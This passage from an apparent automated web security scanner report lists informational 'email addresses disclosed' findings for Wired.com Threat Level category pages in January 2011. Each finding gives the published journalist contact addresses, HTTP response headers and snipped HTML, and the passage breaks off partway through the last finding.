<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.74. http://www.wired.com/threatlevel/category/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/intellectual-property/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:03 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=213
Expires: Wed, 12 Jan 2011 15:33:52 GMT
Date: Wed, 12 Jan 2011 15:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.75. http://www.wired.com/threatlevel/category/lori-drew-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/lori-drew-trial/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=98
Expires: Wed, 12 Jan 2011 15:32:12 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.76. http://www.wired.com/threatlevel/category/network-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/network-neutrality/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=147
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:30:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.77. http://www.wired.com/threatlevel/category/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/nsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=150
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.78. http://www.wired.com/threatlevel/category/openleaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/openleaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=139
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:30:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.79. http://www.wired.com/threatlevel/category/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/politics/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=124
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.80. http://www.wired.com/threatlevel/category/porn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/porn/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:30:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=174
Expires: Wed, 12 Jan 2011 15:34:06 GMT
Date: Wed, 12 Jan 2011 15:31:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.81. http://www.wired.com/threatlevel/category/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/privacy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jj@gizmodo.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=199
Expires: Wed, 12 Jan 2011 15:34:36 GMT
Date: Wed, 12 Jan 2011 15:31:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:jj@gizmodo.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.82. http://www.wired.com/threatlevel/category/rfid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rfid/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
penneth@gmail.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=103
Expires: Wed, 12 Jan 2011 15:32:59 GMT
Date: Wed, 12 Jan 2011 15:31:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:penneth@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.83. http://www.wired.com/threatlevel/category/riaa-litigation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/riaa-litigation/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=126
Expires: Wed, 12 Jan 2011 15:33:26 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.84. http://www.wired.com/threatlevel/category/rsa-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rsa-conference/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=138
Expires: Wed, 12 Jan 2011 15:33:38 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.85. http://www.wired.com/threatlevel/category/sexting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sexting/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=121
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.86. http://www.wired.com/threatlevel/category/spooks-gone-wild/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/spooks-gone-wild/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:40 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=99
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:31:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.87. http://www.wired.com/threatlevel/category/stuxnet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/stuxnet/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=166
Expires: Wed, 12 Jan 2011 15:34:24 GMT
Date: Wed, 12 Jan 2011 15:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.88. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sunshine-and-secrecy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jj@gizmodo.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel1@wired.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=93
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:jj@gizmodo.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:threatlevel1@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.89. http://www.wired.com/threatlevel/category/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/surveillance/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:05 +0000
Content-Type: text/html;charset=UTF-8
